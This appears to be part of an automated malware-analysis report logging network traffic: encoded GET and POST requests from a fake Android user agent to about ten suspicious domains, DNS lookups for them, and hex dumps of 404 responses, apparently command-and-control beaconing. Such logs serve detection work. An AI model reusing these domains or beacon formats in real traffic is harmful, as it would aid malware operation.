                Source: global trafficHTTP traffic detected: GET /cs9k/?Ebfx6=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gpP2tZBVouQbNz2bSzCzmmREJaSGclyy3fj8=&Njld=LDTtwxbX2vi0G HTTP/1.1Host: www.holytur.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /30le/?Ebfx6=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+CHSERU+xtauim+BahOPB0GJcVol5yfYldYk=&Njld=LDTtwxbX2vi0G HTTP/1.1Host: www.nieuws-july202488.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /s15n/?Njld=LDTtwxbX2vi0G&Ebfx6=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3OopepfoLIsZrpge9AZLN4C6qP0OMt8= HTTP/1.1Host: www.losmason.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /yf1h/?Ebfx6=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQyubLBbwIZCSROCky8LXr2m/Vfw5jzg=&Njld=LDTtwxbX2vi0G HTTP/1.1Host: www.hayaniya.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /rxts/?Ebfx6=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmL/pMmG95haE2aMKVRHbzfzsbYvt06DCBrRY=&Njld=LDTtwxbX2vi0G HTTP/1.1Host: www.lovel.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /zs4o/?Ebfx6=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYoR4vWs9osNHqTA3jhptZMXJwhZ2LicMQ2+w=&Njld=LDTtwxbX2vi0G HTTP/1.1Host: www.duskgazes.workAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /xyvr/?Njld=LDTtwxbX2vi0G&Ebfx6=Dk/wQKBXq4hP/zVb9ApyZmDkyzbQqrM0hWgYI5VbiKGV4GeQY6os12Lf5EdpuHYA6f15h+K7XFjq1wIjorrCnH6ZrpZ66ZcdvUt/dXVK/m2TWNblWa9AhcM= HTTP/1.1Host: www.zrinorem-srumimit.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /dnjw/?Ebfx6=LLuahgeFNd50MfmeR+YO4X7oQIpbAv675x2tVSlUIoVemPDFIi7IcWvJHwj84u5Zt+Ov/a/NakHy5HK7jRYViNkqfBLCVUFvihPDLt9byicPXxQNcd7bh2g=&Njld=LDTtwxbX2vi0G HTTP/1.1Host: www.6822662.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /404o/?Njld=LDTtwxbX2vi0G&Ebfx6=WKBQtURp4mxoG42HvJVFdxkBeoRQKLcKkncaZCQ6BKNKWWSe5DM6Y469mdl3/OFUlQwZCGrNWgxnPoxBbE5j38LAsICWCsVDGGe9oFVLx/4b7CRN5YGXwG8= HTTP/1.1Host: www.lingdianyun29.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /d5up/?Ebfx6=t4sGAbB2VavWqiiIadPUj68mTJ7Q54MapR6mUVHY3SwgNZVHyOwsTaauiAAffAhHdKJKrrjT+NERuNHfq0vx0hlOGpFc29QbO/AvwrqpPk1c7Mdu4vpn2Z4=&Njld=LDTtwxbX2vi0G HTTP/1.1Host: www.learnnow.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.holytur.net
                Source: global trafficDNS traffic detected: DNS query: www.nieuws-july202488.sbs
                Source: global trafficDNS traffic detected: DNS query: www.losmason.shop
                Source: global trafficDNS traffic detected: DNS query: www.hayaniya.org
                Source: global trafficDNS traffic detected: DNS query: www.lovel.shop
                Source: global trafficDNS traffic detected: DNS query: www.duskgazes.work
                Source: global trafficDNS traffic detected: DNS query: www.zrinorem-srumimit.sbs
                Source: global trafficDNS traffic detected: DNS query: www.6822662.xyz
                Source: global trafficDNS traffic detected: DNS query: www.lingdianyun29.xyz
                Source: global trafficDNS traffic detected: DNS query: www.learnnow.info
                Source: global trafficDNS traffic detected: DNS query: www.carpentry.club
                Source: unknownHTTP traffic detected: POST /30le/ HTTP/1.1Host: www.nieuws-july202488.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: closeContent-Length: 202Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedOrigin: http://www.nieuws-july202488.sbsReferer: http://www.nieuws-july202488.sbs/30le/User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 45 62 66 78 36 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 67 4a 65 35 64 58 45 46 70 45 32 49 67 50 58 47 6e 79 32 78 79 75 35 31 50 58 53 64 68 46 6b 49 6a 7a 62 30 4f 54 36 2b 4c 6c 6c 35 6d 35 55 59 7a 51 42 71 66 36 6b 4e 52 4f 55 61 76 56 37 73 4f 6f 62 68 69 6d 4b 30 65 6b 6e 49 41 6b 2b 69 6c 36 61 65 6e 4d 49 76 38 64 50 43 31 32 4a 4e 65 70 30 36 32 2f 70 35 4c 59 74 65 6f 6e 69 44 56 6c 31 35 67 45 67 44 79 45 6c 2b 32 38 41 58 51 6f 33 32 75 30 48 7a 53 4b 6f 78 79 72 51 71 38 66 62 43 53 75 45 52 35 56 71 34 79 71 56 53 68 37 2f 64 42 77 43 6d 70 62 35 66 64 42 6f 39 74 72 55 47 70 67 3d 3d Data Ascii: Ebfx6=uFsbYKxiJxYpgJe5dXEFpE2IgPXGny2xyu51PXSdhFkIjzb0OT6+Lll5m5UYzQBqf6kNROUavV7sOobhimK0eknIAk+il6aenMIv8dPC12JNep062/p5LYteoniDVl15gEgDyEl+28AXQo32u0HzSKoxyrQq8fbCSuER5Vq4yqVSh7/dBwCmpb5fdBo9trUGpg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 07:43:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 09 Dec 2024 07:43:36 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 09 Dec 2024 07:43:38 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 09 Dec 2024 07:43:41 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Mon, 09 Dec 2024 07:43:44 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
